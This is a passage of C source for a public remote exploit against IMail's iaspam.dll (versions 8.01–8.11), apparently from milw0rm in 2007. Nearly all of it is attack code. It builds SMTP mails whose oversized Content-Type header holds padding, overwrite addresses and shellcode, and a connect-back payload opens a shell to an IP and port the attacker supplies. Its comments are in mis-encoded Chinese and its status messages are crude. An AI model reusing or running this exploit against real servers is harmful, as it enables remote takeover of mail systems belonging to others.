    memset(payload, 0x00, sizeof(payload));
		memcpy(payload, sh_Buff, strlen((const char*)sh_Buff));
		memcpy(payload+strlen((const char*)sh_Buff), "\r\n", 2);
		
		send(s, (const char *)payload, strlen((const char *)payload), 0);

		memset(payload, 0x00, sizeof(payload));
		


	} 
	else	  // µÚÈý·âÓÊŒþ£¬¹¹ÔìÒç³ö
	{
		Sleep(500); // ÒòΪҪŽ¥·¢Â©¶ŽÁË£¬ËùÒÔ±ØÐëÒªÍíµã£¬²»È»shellcodeûµœÎ»
		/*
      my $padding = "\x22"."B"x2028;
      my $padding1 = "B"x2046;
      my $padding11 = "B"x146;  #163žöB
      my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f";   # ÔÚtebÖÐ
      my $straddr2 = "\x6c\x54\x03\x10";   # shellcode»á¿œ±ŽµœµÄµØÖ·

      print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
    */
		memcpy(payload, szCT, strlen((const char *)szCT));
		//memcpy(payload+strlen(const char *szCT), "\"", 1);
		memset(padding, 0x43, 5000);
		padding[0] = '\x22';  
		padding[2029] = '\x20';
		padding[4076] = '\x20';

		//straddr1
		padding[4223] = '\x50';
		padding[4224] = '\xd0';
		padding[4225] = '\xfd';
		padding[4226] = '\x7f';
		padding[4227] = '\x30';
		padding[4228] = '\xd0';
		padding[4229] = '\xfd';
		padding[4230] = '\x7f';

		//straddr2 Ž¥·¢Òç³öµÄµØÖ·
		padding[4231] = '\x6c';
		padding[4232] = '\x54';
		padding[4233] = '\x03';
		padding[4234] = '\x10';

		padding[4235] = '\x0d';
		padding[4236] = '\x0a';
		padding[4237] = '\x00';

		
		memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
		send(s, (const char *)payload, strlen((const char *)payload), 0);

		// MIME
   	send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
  //	recv(s, buffer, sizeof(buffer), 0);
 //	printf("%s", buffer);
  //   printf("[+]Fucking Server at %s.\n", szTIME);
  // 	memset(buffer, 0, sizeof(buffer));
		
		//print $sock "Content-Transfer-Encoding:$padding2\r\n";
		memset(padding, 0x43, 80);
		//memcpy(padding, "\x43", 80);
		padding[80] = '\x00';

		memset(payload, 0x00, sizeof(payload));
		memcpy(payload, szCTE, strlen((const char*)szCTE));
    memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
    memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);

		send(s, (const char *)payload, strlen((const char *)payload), 0);
		Sleep(200);

		// send payload ÐÞžÄÖžÕëµØÖ·£¬¹¹Ôì³öÒç³ö
    memset(payload, 0x00, sizeof(payload));
		// ÐèÒªÖžÏò¹¹ÔìÒç³ö×Ö·ûŽ®µÄµØÖ·£¬ÒÔŒ°2žö¿ÉÐŽµØÖ·
		memcpy(payload, "\x50\xc0\xfd\x7f", 4);
		memcpy(payload+4, "\x40\xc0\xfd\x7f\x30\xc0\xfd\x7f", 8);
		memcpy(payload+12, "\r\n", 2);
		
		send(s, (const char *)payload, strlen((const char *)payload), 0);

		memset(payload, 0x00, sizeof(payload));

	}


	// END
	Sleep(500);
	send(s, szEND, strlen(szEND), 0);
	recv(s, buffer, sizeof(buffer), 0);
	if(strstr(buffer, "250"))
	 printf("[+]Recv: %s", buffer);
	else
		{
			printf("[-]Seems Service Down~ :( \n");
			Disconnect(s);
			return -1;
		}
	memset(buffer, 0, sizeof(buffer));	// QUIT
	send(s, szQUIT, strlen(szQUIT), 0);
	recv(s, buffer, sizeof(buffer), 0);
//	printf("%s", buffer);
  printf("[+]Fucking END, Ejaculating Now !\n\n");
	memset(buffer, 0, sizeof(buffer));

	
	Sleep(400);

  closesocket(s);

	WSACleanup();

	return 0;

}
int main(int argc, char *argv[])
{

	
	//int imail_ver = 0;  //imail version (buffer²»Í¬)
	//int ret;

	//SOCKET s;
	//WSADATA WSAData;

	printf("\n== IMail iaspam.dll 8.01-8.11 Private Remote Exploit\n");
	printf("== by axis@ph4nt0m\n");
	printf("== http://www.ph4nt0m.org\n");
	printf("== 2007-06\n");
	printf("== 2007-09-18 published as a gift for the 6th Anniversary of Ph4nt0m\n");
	printf("== ConnBack Version\n");
	printf("== Thanks EnvyMask@ph4nt0m\n\n");


	if(argc != 5)
	{
		help(argv[0]);
		return 0;
	}

	if(argc == 5) port = atoi(argv[4]);


	GetShellCode(argv[3], port);
	if (!sh_Len)
	{
		printf("[-] Shellcode generate error.\n");
		exit(1);
	}


	//printf("shellcode length is: %d \n",strlen((char *)sh_Buff));
	//PrintSc(sh_Buff, sh_Len);


	Sleep(200);

	for (int mail_payload = 0; mail_payload <= 3; mail_payload++)
	{
		//printf("[+]Now Sending the %d fucking Mail!\n",mail_payload+1);
		sendfuckingmail(mail_payload, argv[1], atoi(argv[2]));
		Sleep(2000);
	}
	
	printf("Got a Shell on your port ?! @_@\n\n");


	return 1;

}

// milw0rm.com [2007-09-21]